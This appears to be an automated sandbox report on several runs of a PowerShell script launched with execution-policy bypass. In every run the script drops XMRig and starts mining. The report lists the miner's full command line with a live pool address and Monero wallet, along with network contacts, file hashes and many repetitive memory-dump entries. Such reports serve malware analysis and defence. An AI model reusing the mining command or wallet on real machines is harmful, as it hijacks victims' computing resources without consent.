memory/936-117-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-118-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-119-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-120-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-121-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-122-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-123-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-124-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-125-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-126-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-127-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-128-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-129-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-130-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-131-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-132-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-133-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-134-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-135-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-136-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-137-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-138-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-139-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-140-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-141-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-142-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-143-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-144-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-145-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-146-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-147-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-148-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-149-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-150-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-151-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-152-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-153-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-154-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-155-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win11-20240419-en

Max time kernel

1794s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 identical rows, every field N/A (Description, Indicator, Process, Target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1300-0-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gflihdg0.i4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1300-9-0x000001EC71ED0000-0x000001EC71EF2000-memory.dmp

memory/1300-10-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-11-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-12-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-13-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

memory/1300-14-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-16-0x000001EC71F60000-0x000001EC71F72000-memory.dmp

memory/1300-17-0x000001EC71F40000-0x000001EC71F4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2972-48-0x000001BAD7F50000-0x000001BAD7F70000-memory.dmp

memory/2972-49-0x000001BAD7F80000-0x000001BAD7FA0000-memory.dmp

memory/2972-50-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-51-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-52-0x000001BB6A950000-0x000001BB6A970000-memory.dmp

memory/2972-53-0x000001BB6AB80000-0x000001BB6ABA0000-memory.dmp

memory/2972-54-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-56-0x000001BB6A950000-0x000001BB6A970000-memory.dmp

memory/2972-55-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-57-0x000001BB6AB80000-0x000001BB6ABA0000-memory.dmp

memory/2972-58-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-59-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-60-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-61-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-62-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-63-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-64-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-65-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-66-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-67-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-68-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-69-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-70-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-71-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-72-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-73-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-74-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-75-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-76-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-77-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-78-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-79-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-80-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-81-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-82-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-83-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-84-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-85-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-86-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-87-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-88-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-89-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-90-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-91-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-92-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-93-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-94-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-95-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-96-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-97-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-98-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-99-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-100-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-101-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-102-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-103-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-104-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-105-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-106-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-107-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-108-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-109-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-110-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-111-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-112-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-113-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-114-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-115-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-116-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:41

Platform

win11-20240508-en

Max time kernel

1793s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 identical rows, every field N/A (Description, Indicator, Process, Target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5rloflwa.nzq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2492-9-0x000001FC45F00000-0x000001FC45F22000-memory.dmp

memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-13-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-15-0x000001FC5E380000-0x000001FC5E392000-memory.dmp

memory/2492-16-0x000001FC45EF0000-0x000001FC45EFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3848-47-0x00000265CF8E0000-0x00000265CF900000-memory.dmp

memory/3848-48-0x0000026661EA0000-0x0000026661EC0000-memory.dmp

memory/3848-49-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-50-0x0000026662520000-0x0000026662540000-memory.dmp

memory/3848-51-0x0000026662500000-0x0000026662520000-memory.dmp

memory/3848-52-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-53-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-56-0x0000026662500000-0x0000026662520000-memory.dmp

memory/3848-55-0x0000026662520000-0x0000026662540000-memory.dmp

memory/3848-54-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-57-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-58-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-59-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-60-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-61-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-62-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-63-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-64-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-65-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-66-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-67-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-68-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-69-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-70-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-71-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-72-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-73-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-74-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-75-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-76-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-77-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-78-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-79-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-80-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-81-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-82-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-83-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-84-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-85-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-86-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-87-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-88-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-89-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-90-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-91-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-92-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-93-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-94-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-95-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-96-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-97-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-98-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-99-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-100-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-101-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-102-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-103-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-104-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-105-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-106-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-107-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-108-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-109-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-110-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-111-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-112-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-113-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-114-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-115-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:41

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 identical rows, every field N/A (Description, Indicator, Process, Target)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1636-3-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp

memory/1636-5-0x0000021026640000-0x0000021026662000-memory.dmp

memory/1636-8-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y41a0gmz.o5y.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1636-10-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-9-0x00000210267F0000-0x0000021026866000-memory.dmp

memory/1636-25-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-29-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-30-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp

memory/1636-31-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-32-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-52-0x0000021026CC0000-0x0000021026CD2000-memory.dmp

memory/1636-65-0x00000210267D0000-0x00000210267DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4568-94-0x0000014BB1470000-0x0000014BB1490000-memory.dmp

memory/4568-95-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-96-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-97-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-98-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-99-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-100-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-101-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-102-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-103-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-104-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-105-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-106-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-107-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-108-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-109-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-110-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-111-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-112-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-113-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-114-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-115-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-116-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-117-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-118-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-119-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-120-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-121-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-122-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-123-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-124-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-125-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-126-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-127-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-128-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

